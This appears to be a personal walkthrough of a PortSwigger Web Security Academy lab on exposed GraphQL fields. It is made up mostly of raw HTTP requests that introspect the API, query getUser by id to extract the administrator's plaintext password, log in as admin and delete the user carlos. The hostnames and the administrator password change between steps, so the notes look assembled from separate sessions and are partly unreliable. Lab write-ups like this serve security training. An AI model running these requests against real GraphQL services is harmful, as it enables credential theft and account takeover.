Skip to content

Port Swigger Accidental exposure of private GraphQ

Accidental exposure of private GraphQL fields

Solution

Login to wiener panel

POST /graphql/v1 HTTP/2
Host: 0a91008904b5d24e838eb58600a40019.web-security-academy.net
Cookie: session=MeyLQ5tyy4B3n0H5cWFxBRuCXASYhsrx
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: application/json
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a91008904b5d24e838eb58600a40019.web-security-academy.net/login
Content-Type: application/json
Content-Length: 232
Origin: https://0a91008904b5d24e838eb58600a40019.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

{"query":"\n    mutation login($input: LoginInput!) {\n        login(input: $input) {\n            token\n            success\n        }\n    }","operationName":"login","variables":{"input":{"username":"wiener","password":"peter"}}}

Sent request to Repeater

Set request to Repeater and choose GraphQL > Set introspection query
---
POST /graphql/v1 HTTP/2
Host: 0afc004903af986380d3e41800cd007b.web-security-academy.net
Cookie: session=c3ipwujeH9rhWECk6l0qIhLpjt8QRbEK
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: application/json
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0afc004903af986380d3e41800cd007b.web-security-academy.net/login
Content-Type: application/json
Content-Length: 232
Origin: https://0afc004903af986380d3e41800cd007b.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

{"query":"\n    mutation login($input: LoginInput!) {\n        login(input: $input) {\n            token\n            success\n        }\n    }","operationName":"login","variables":{"input":{"username":"wiener","password":"peter"}}}
---

Save GraphQL quesries to site map

Choose GraphQL > Save GraphQL queries to site map
We see query:
{"query":"query($id: Int!) {\n  getUser(id: $id) {\n    id\n    username\n    password\n  }\n}","variables":{"id":0}}
---
POST /graphql/v1 HTTP/1.1
Host: 0afc004903af986380d3e41800cd007b.web-security-academy.net
Cookie: session=c3ipwujeH9rhWECk6l0qIhLpjt8QRbEK
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: application/json
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0afc004903af986380d3e41800cd007b.web-security-academy.net/login
Content-Type: application/json; charset=utf-8
Origin: https://0afc004903af986380d3e41800cd007b.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
Content-Length: 117

{"query":"query($id: Int!) {\n  getUser(id: $id) {\n    id\n    username\n    password\n  }\n}","variables":{"id":0}}

Edit request

Sent request to repeater and edit id from "o" to "1"
I get username and password:
{
  "data": {
    "getUser": {
      "id": 1,
      "username": "administrator",
      "password": "71g50dxpl364a23ro4j3"
    }
  }
}
---
(1) Request
POST /graphql/v1 HTTP/1.1
Host: 0afc004903af986380d3e41800cd007b.web-security-academy.net
Cookie: session=c3ipwujeH9rhWECk6l0qIhLpjt8QRbEK
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: application/json
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0afc004903af986380d3e41800cd007b.web-security-academy.net/login
Content-Type: application/json; charset=utf-8
Origin: https://0afc004903af986380d3e41800cd007b.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
Content-Length: 117

{"query":"query($id: Int!) {\n  getUser(id: $id) {\n    id\n    username\n    password\n  }\n}","variables":{"id":0}}
---
POST /graphql/v1 HTTP/2
Host: 0afc004903af986380d3e41800cd007b.web-security-academy.net
Cookie: session=c3ipwujeH9rhWECk6l0qIhLpjt8QRbEK
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: application/json
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0afc004903af986380d3e41800cd007b.web-security-academy.net/login
Content-Type: application/json; charset=utf-8
Origin: https://0afc004903af986380d3e41800cd007b.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
Content-Length: 117

{"query":"query($id: Int!) {\n  getUser(id: $id) {\n    id\n    username\n    password\n  }\n}","variables":{"id":1}}

Login to admin panel

POST /graphql/v1 HTTP/2
Host: 0a91008904b5d24e838eb58600a40019.web-security-academy.net
Cookie: session=fou7fKQsrZdKuJolmqfuGMb61jbY7bau; session=nM4SJ2LE162TjTMliTgmoUVovPyYUDdf
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: application/json
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a91008904b5d24e838eb58600a40019.web-security-academy.net/login
Content-Type: application/json
Content-Length: 254
Origin: https://0a91008904b5d24e838eb58600a40019.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

{"query":"\n    mutation login($input: LoginInput!) {\n        login(input: $input) {\n            token\n            success\n        }\n    }","operationName":"login","variables":{"input":{"username":"administrator","password":"99qfsqohrwt42nx18g0d"}}}
---
GET /my-account HTTP/2
Host: 0a91008904b5d24e838eb58600a40019.web-security-academy.net
Cookie: session=Pnu0XAxyVMybXHcE1AMN7t59Q9p1nW7M
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a91008904b5d24e838eb58600a40019.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

Delete user: carlos

GET /admin HTTP/2
Host: 0a91008904b5d24e838eb58600a40019.web-security-academy.net
Cookie: session=Pnu0XAxyVMybXHcE1AMN7t59Q9p1nW7M
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a91008904b5d24e838eb58600a40019.web-security-academy.net/my-account
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
---
GET /admin/delete?username=carlos HTTP/2
Host: 0a91008904b5d24e838eb58600a40019.web-security-academy.net
Cookie: session=Pnu0XAxyVMybXHcE1AMN7t59Q9p1nW7M
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a91008904b5d24e838eb58600a40019.web-security-academy.net/admin
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

Solved